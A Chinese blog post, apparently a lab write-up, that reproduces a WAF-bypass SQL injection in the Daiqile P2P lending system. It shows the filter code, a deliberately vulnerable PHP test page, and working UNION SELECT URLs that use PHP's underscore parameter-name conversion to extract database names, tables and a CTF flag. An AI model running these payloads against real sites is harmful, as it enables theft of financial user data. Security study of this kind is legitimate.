贷齐乐漏洞复现

最新推荐文章于 2024-09-14 16:21:49 发布
最新推荐文章于 2024-09-14 16:21:49 发布
阅读量822 收藏 5
点赞数 13
文章标签: 服务器 数据库 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/beizhibuhuiqiaod/article/details/141108887
版权

贷齐乐的两层WAF

第一层WAF: 

class sqlin {
	function dowith_sql($str) {
		$check= eregi('select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile', $str);
		if($check)
			{
			echo "非法字符!";
			exit();
		}
		
		$newstr="";
		while($newstr!=$str){
		$newstr=$str;
        $str = str_replace("script", "", $str);
        $str = str_replace("execute", "", $str);
        $str = str_replace("update", "", $str);
        //$str = str_replace("count", "", $str);
        //注释掉对count的过滤,不然account这样的参数会被截断
        $str = str_replace("master", "", $str);
        $str = str_replace("truncate", "", $str);
        $str = str_replace("declare", "", $str);
        $str = str_replace("select", "", $str);
        $str = str_replace("create", "", $str);
        $str = str_replace("delete", "", $str);
        $str = str_replace("insert", "", $str);
        $str = str_replace("\'", "", $str);

		}
		return $str;
    }

     包含点,单引号,星号等等,一旦包含直接删除非法字符,然后又注释掉了一系列东西,这是第一个WAF防御。

//aticle()防SQL注入函数//php教程
    function sqlin() {
        foreach ($_GET as $key => $value) {
            if ($key != "content"&&strstr($key, "password") == false) {
                $_GET[$key] = $this->dowith_sql($value);
            }
        }
        foreach ($_POST as $key => $value) {
			//echo $key."|".(strpos($key, "password") == false);
			[email protected]_put_contents('wxy123123.txt', date('Ymd His') . '提交url拼接 '.$key."|".(strstr($key, "password") == false), FILE_APPEND);
            if ($key != "content"&&strstr($key, "password") == false) {
                $_POST[$key] = $this->dowith_sql($value);
            }
        }
		foreach ($_REQUEST as $key => $value) {
			//echo $key."|".(strpos($key, "password") == false);
            if ($key != "content"&&strstr($key, "password") == false) {
                $_REQUEST[$key] = $this->dowith_sql($value);
            }
        }
    }
}

       将GET获取到的所有值来进行判断是否含还有password,如果没有,那么就执行第一层WAF来进行检测,GET传参不行,单引号也是闭合不了的。第二段则是将POST也进行了循环,然后进行过滤,执行第一层WAF,第三段则是REQUEST同样是进行循环然后过滤掉了。

第二层WAF:

/* 检查和转义字符 */
function safe_str($str){
    if(!get_magic_quotes_gpc()) {
        if( is_array($str) ) {
            foreach($str as $key => $value) {
                $str[$key] = safe_str($value);
            }
        }else{
            $str = addslashes($str);
        }
    }
    return $str;
}

这里我们可以看到里面首先进行了魔术开关的判断,然后就是判断是不是数组,如果是数组,那么循环进行safe_str函数循环判断,如果不是数组,那么直接执行addslashes进行过滤。

function dhtmlspecialchars($string) {
    if(is_array($string)) {
        foreach($string as $key => $val) {
            $string[$key] = dhtmlspecialchars($val);
        }
    } else {
        $string = str_replace(array('&', '"', '<', '>','(',')'), array('&amp;', '&quot;', '&lt;', '&gt;','(',')'), $string);
        if(strpos($string, '&amp;#') !== false) {
            $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
        }
    }
    return $string;
}

foreach ($_GET as $key => $value) {
    $_GET[$key] = safe_str($value);
    $_GET[$key] = dhtmlspecialchars($value);
}
foreach ($_POST as $key => $value) {
    $_POST[$key] = safe_str($value);
    $_GET[$key] = dhtmlspecialchars($value);
}
foreach ($_REQUEST as $key => $value) {
    $_REQUEST[$key] = safe_str($value);
    $_REQUEST[$key] = dhtmlspecialchars($value);
}
foreach ($_COOKIE as $key => $value) {
    $_COOKIE[$key] = safe_str($value);
    $_GET[$key] = dhtmlspecialchars($value);
}

这个函数关键点在于括号替换了,替换为中文的括号,剩下的便是双引号等等字符被转义,这里我们报错注入直接用不了了。剩下的便是GET、POST、REQUEST、COOKIE传参方式全部进入这两个函数进行过滤,从而达到防御的效果,这里我们不能写闭合,不能写括号,这里我们再注入已经几乎没办法进行注入了。所以我们想要完成注入,肯定就必须绕过这两个WAF。

如何绕过贷齐乐的两层WAF

一、模拟源码

<?php
header("Content-type: text/html; charset=utf-8");
require 'db.inc.php';
  function dhtmlspecialchars($string) {
      if (is_array($string)) {
          foreach ($string as $key => $val) {
              $string[$key] = dhtmlspecialchars($val);
          }
      }
      else {
          $string = str_replace(array('&', '"', '<', '>', '(', ')'), array('&amp;', '&quot;', '&lt;', '&gt;', '(', ')'), $string);
          if (strpos($string, '&amp;#') !== false) {
              $string = preg_replace('/&amp;((#(\d{3,5}|x[a-fA-F0-9]{4}));)/', '&\\1', $string);
          }
      }
      return $string;
  }
  function dowith_sql($str) {
      $check = preg_match('/select|insert|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile/is', $str);
      if ($check) {
          echo "非法字符!";
          exit();
      }
      return $str;
  }
  //经过第一道WAF处理
  foreach ($_REQUEST as $key => $value) {
      $_REQUEST[$key] = dowith_sql($value);
  }
  // 经过第二个WAF处理
  $request_uri = explode("?", $_SERVER['REQUEST_URI']);
  if (isset($request_uri[1])) {
      $rewrite_url = explode("&", $request_uri[1]);
      foreach ($rewrite_url as $key => $value) {
          $_value = explode("=", $value);
          if (isset($_value[1])) {
              $_REQUEST[$_value[0]] = dhtmlspecialchars(addslashes($_value[1]));
          }
      }
  }
  // 业务处理
  if (isset($_REQUEST['submit'])) {
      $user_id = $_REQUEST['i_d'];
      $sql = "select * from ctf.users where id=$user_id";
      $result = mysql_query($sql);
      while($row = mysql_fetch_array($result))
      {
          echo "<tr>";
          echo "<td>" . $row['name'] . "</td>";
          echo "</tr>";
      }
  }
?>

2、连接数据库源码

<?php
$mysql_server_name="localhost";
$mysql_database="ctf";    /** 数据库的名称 */
$mysql_username="root";  /** MySQL数据库用户名 */
$mysql_password="123456";  /** MySQL数据库密码 */
$conn = mysql_connect($mysql_server_name, $mysql_username,$mysql_password,'utf-8');
?>

3、数据库创建
这里我们需要自己创建数据库以及表名,首先我们创建数据库:

CREATE DATABASE ctf;


创建表名:

CREATE TABLE `users` (
  `Id` int(11) NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  `pass` varchar(255) DEFAULT NULL,
  `flag` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`Id`)
) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8


添加数据(flag):

INSERT INTO `users` (`name`, `pass`, `flag`) VALUES ('admin', 'qwer!@#zxca', 'hrctf{R3qu3st_Is_1nterEst1ng}');


以上就是创建数据库、表以及数据的操作,最终即可看到:

二、测试


传入1以及单引号给id,即可看到回显结果显示非法字符:

http://127.0.0.1/daiqile/index.php/?id=1'

三、注入思路

我们从第二道WAF那看不到什么大的问题,但是如果我们结合第一道WAF就可以看到第二道WAF其实就是第一道WAF执行完之后进行执行的。

所以,我们得思考下如果我们有一种方法让第一道WAF检测不到恶意字符,再通过第二道WAF的覆盖,从而将恶意字符传入到$REQUEST中,其实也就可以绕过WAF,完成我们的注入了。

找好了思路,那么我们就得想办法找到这个方法,这个想法之前我们说了要让第一道WAF找不到恶意字符,那么我们就得再$REQUET中不得有恶意字符。其二便是$_SERVER可以有恶意字符,但是必须过我们的第二道WAF,然后再REQUEST接收。

既然上面我们从绕过WAF变为了如何让第一道WAF检测不到恶意字符,那么我们又得想一个办法。让第一道WAF检测不到恶意字符的思路便是,在第一道WAF进行检测时,检测为2,但是在覆盖REQUEST时候使它最终拿到1便可完成第一道WAF的绕过。

PHP下划线特性这里我们需要了解PHP的一个小特性,那就是自身在进行解析的时候,如果参数中含有” “、”.”、”[“这几个字符,那么会将他们转换为下划线。

所以我们可以利用这个特性,让第一道WAF解析一个正常的参数,第二道WAF来解析另一个恶意字符的参数从而完成覆盖注入。

四、进行实验

1、测试回显字段

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,2,3,4&i.d=1&submit=1

2、爆出库名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_schema,3,4/**/from/**/information_schema.tables&i.d=1&submit=1

3、爆出表名

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,table_name,3,4/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/0x637466/**/limit/**/0,1&i.d=1&submit=1

4、爆出flag

http://127.0.0.1/daiqile/index.php/?i_d=-1/**/union/**/select/**/1,flag,3,4/**/from/**/ctf.users&i.d=1&submit=1

北栀从不敲代码
关注
贷齐乐p2p借贷系统V2.1商业版
04-15
页面使用php技术 集理财与借款功能于一体 支持登录、注册 实名认证,手机号绑定、身份证 认证 支付宝充值、提现等功能
贷齐乐系统最新版SQL注入(绕过WAF可union select跨表查询)
aihua002的博客
08-11 1024
目录标题:贷齐乐系统最新版SQL注入(绕过WAF可union select跨表查询)内容:一,环境部署二,源码分析三,sql注入总结:[回到顶部](#article_top)
贷齐乐错误的waf引起的SQL注入漏洞复现
钟言的博客
03-07 6828
本篇复现贷齐乐错误的waf引起的SQL注入漏洞,详细内容包含了环境介绍 1、第一道WAF 2、第二道WAF 环境部署 1、模拟源码 2、连接数据库源码 3、数据库创建 4、测试 源码分析 1、模拟WAF 2、注入思路 3、PHP下划线特性 4、完成假设 四、联合查询注入 1、测试回显字段 2、爆出库名 3、爆出表名4、爆出表下的列名 4、爆出flag等内容
RCE多种绕过技巧+贷齐乐漏洞复现
Nirvana92的博客
08-11 1204
主要就是绕过该代码首先,我们来解析一下这个代码的重点:1、首先是第一点他限制了代码的长度,不能超过35个字节,但是这个无关紧要,下面这个才是最重要的2、第二点他过滤了所有的字母和数字,也就是说,不能输入如何字母/数字——即只是输入字符,?????
贷齐乐利用hpp+php特性进行注入
01-08
贷齐乐利用hpp+php特性进行注入
P2P借贷平台源码,拍拍贷借贷程序,贷齐乐借贷程序
06-04
P2P借贷平台源码/拍拍贷借贷程序/贷齐乐借贷程序,修正已知BUG,完美无错 使用前确保您空间支持PHP+MYSQL,还有伪静态,否则将无法正常使用! 使用规则位于根目录的.htaccess、httpd.ini文件,如何设置请咨询空间商! ...
贷齐乐系统最新版SQL注入(无需登录绕过WAF可union select跨表查询)
02-22
标题中的“贷齐乐系统最新版SQL注入”指的是在该系统的最新版本中存在一个SQL注入漏洞。SQL注入是一种常见的网络安全问题,它允许攻击者通过在输入字段中插入恶意的SQL代码来操纵数据库查询,从而获取敏感信息、修改...
齐乐手机2690产品培训资料.pptx
11-26
齐乐手机2690是一款特别为2010年上海世博会设计的音乐灯光折叠手机,具有独特的设计和出色的功能。这款手机以其创新的雪绒花呼吸灯和卓越的音乐体验为核心卖点,旨在吸引年轻用户群体。 产品概述: 齐乐2690手机...
基于高通主板的ARM架构服务器
D404234的博客
09-11 1351
但高通在服务器市场面临激烈竞争,联发科在手机芯片市场挑战高通,苹果加快自研芯片使用步伐给高通压力,服务器市场英特尔占主导,高通要成功需克服诸多困难。高通在服务器芯片领域面临挑战,有收购与专利问题,博通收购后高通削减“非核心业务”支出,Intel 市占率高且 Arm 生态和软件不完善,高通在 Arm 服务器芯片市场进展不大,2018 年高通服务器芯片部门裁员约 280 名,占部门总人数一半左右,业务前景充满不确定性。易获取部署,众多供应商,90%主流软件适配,兼容性强,常见系统和程序可顺畅运行。
Linux:五种IO模型
MaoRuofeng的博客
09-09 1221
阻塞IO: 在内核将数据准备好之前,系统调用会一直等待.所有的套接字,默认 都是阻塞方式。非阻塞 IO: 如果内核还未将数据准备好, 系统调用仍然会直接返回, 并且返回EWOULDBLOCK 错误码。 非阻塞 IO 往往需要循环的方式反复尝试读写文件描述符(对于CPU会有较大的浪费), 这个过程称为轮询。 信号驱动 IO: 内核将数据准备好的时候, 使用 SIGIO 信号通知应用程序进行 IO操作。IO 多路转接: 虽然从流程图上看起来
Windows电脑A远程连接电脑B
weixin_44750594的博客
09-11 233
3. 打开电脑A,如果默认没有搜索图标出来,可以利用Windows+X调用出搜索命令,之后输入“远程桌面连接”,打开远程桌面把B电脑的IP输入。ip看以无线局域网适配器 WLAN里面的本地链接IPV6地址:X.X.X.X(这是那个地址的格式就是,例如为10.222.1.2)4. 如果电脑B有密码和名字,把电脑的名字和电脑密码输入给A,这样就可以连接。
怎么选择适合的服务器
2403_86998484的博客
09-14 408
大家都知道,不管是公司还是个人,在数字化浪潮已经席卷全球的环境下,大家对服务器的需求是日渐增长的。很多人在买服务器的时候,多少都有点选择困难,今天我们就来对比下物理服务器和弹性云服务器,看看选哪个更省心。业务规模:如果你的业务还在起步阶段,或者只是想自己倒腾点东西,比如建steam游戏的服务器、建个人博客、论坛等,那么云服务器应该更适合你。想象一下,物理服务器就像你家的老式冰箱,虽然样子有点过时,但性能稳定,用起来心里踏实。而弹性云服务器,就像是你的智能手机,随时随地,想怎么用就怎么用。
【银河麒麟高级服务器操作系统】虚拟机服务器执行systemctl提示timeout——分析全过程及处理建议
银河麒麟操作系统的博客
09-10 1246
了解全新产品,请点击访问产品信息产品名称银河麒麟高级服务器操作系统(海光版)V10ISO环境信息主机型号虚拟机systemd崩溃,后续systemd连接异常,systemctl失败。需要查明systemd崩溃原因根据sosreport中的messages信息,systemd发生了coredump,收到了信号SIGQUIT。见图2.1.1图2.1.1使用gdb分析systemd的coredump文件,显示systemd是收到了SIGQUIT后发生的coredump。并未调用错误处理函数。
828华为云征文 | 华为云X实例服务器上部署知识图谱项目的详细指南
cooldream2009的博客
09-11 1400
知识图谱作为数据整合、语义分析和人工智能的重要基础,逐渐被广泛应用于各类领域。其通过结构化数据和关系映射,帮助用户更好地理解数据背后的意义。本文将详细介绍如何在华为云X实例服务器上部署一个完整的知识图谱项目,涵盖开发环境JDK、Tomcat应用服务器、Virtuoso图数据库以及MySQL关系型数据库的安装与配置。结合实例的硬件配置,我们将讨论其性能表现,帮助读者理解如何高效利用云服务器资源。
Zabbix自定义监控项与触发器
henanchenxuyuan的博客
09-11 1478
Zabbix 中内置了很多监控参数(Key),我们可以通过在客户端配置文件中定义 key,获取监控对象中的系统、CPU、网络、内存、文件系统等信息。Key(键)是 zabbix 标记 item 的键,是一种标识符。利用 key 可以定义一个监控对象,那么这个监控对象肯定是采集数据的,但是采集数据的时候可能存在很多节点与 server 交互,那么需要具体采集哪个节点,就可以用 key 进行采集。
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
不会编程的猫星人
09-14 705
postgres_fdw访问存储在外部 PostgreSQL 服务器中的数据
集群聊天服务器项目【C++】(二)Json的简单使用
最新发布
xaiobai123的博客
09-14 462
Json是一种轻量级的数据交换格式(也叫数据序列化方式)。Json采用完全独立于编程语言的文本格式来存储和表示数据。简洁和清晰的层次结构使得 Json 成为理想的数据交换语言。易于人阅读和编写,同时也易于机器解析和生成,并有效地提升网络传输效率。在网络传输中,一般有3中常见的序列化格式:XML,Json、ProtoBufProtoBuf:数据压缩编码传输,占用带宽小,复杂Json:相比与ProtoBuf更简单,但性能差一点XML:性能差本项目使用Json完成网络数据的序列化与反序列化。
在 Ubuntu 下通过 Docker 部署 Misskey 服务器
shelby_loo的博客
09-11 537
Docker 是一个开源的应用容器引擎,它可以让开发者将应用及其依赖打包成一个标准化的容器,从而实现一致的开发、测试和生产环境。使用 Docker 部署应用可以极大地简化环境配置和版本管理。Misskey 是一个基于 Node.js 的社交媒体平台,支持多种功能,如发布状态、评论、私信等。它有着友好的用户界面和强大的扩展性,非常适合个人和小型社区使用。通过 Docker 部署 Misskey,我们可以快速搭建自己的社交媒体平台,而无需深入了解复杂的安装过程。
大带宽服务器租用适用于哪些场景?
wanhengwangluo的博客
09-11 365
首先大带宽服务器最大的优势就在于可以提供高速的网络连接,随着网络技术的发展,越来越多的用户开始观看高清视频和照片,而大带宽服务器能够让用户在观看的过程中不会出现页面卡顿和缓冲的情况,非常适用于视频应用平台。大带宽服务器还可以运用在大型的网络游戏和应用当中,支持大量用户同时在线,并且大带宽服务器租用能够提供强大的计算能力和稳定的网络连接,用于应用来处理大量的数据传输与实时交互的工作,确保应用可以进行正常的运行。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值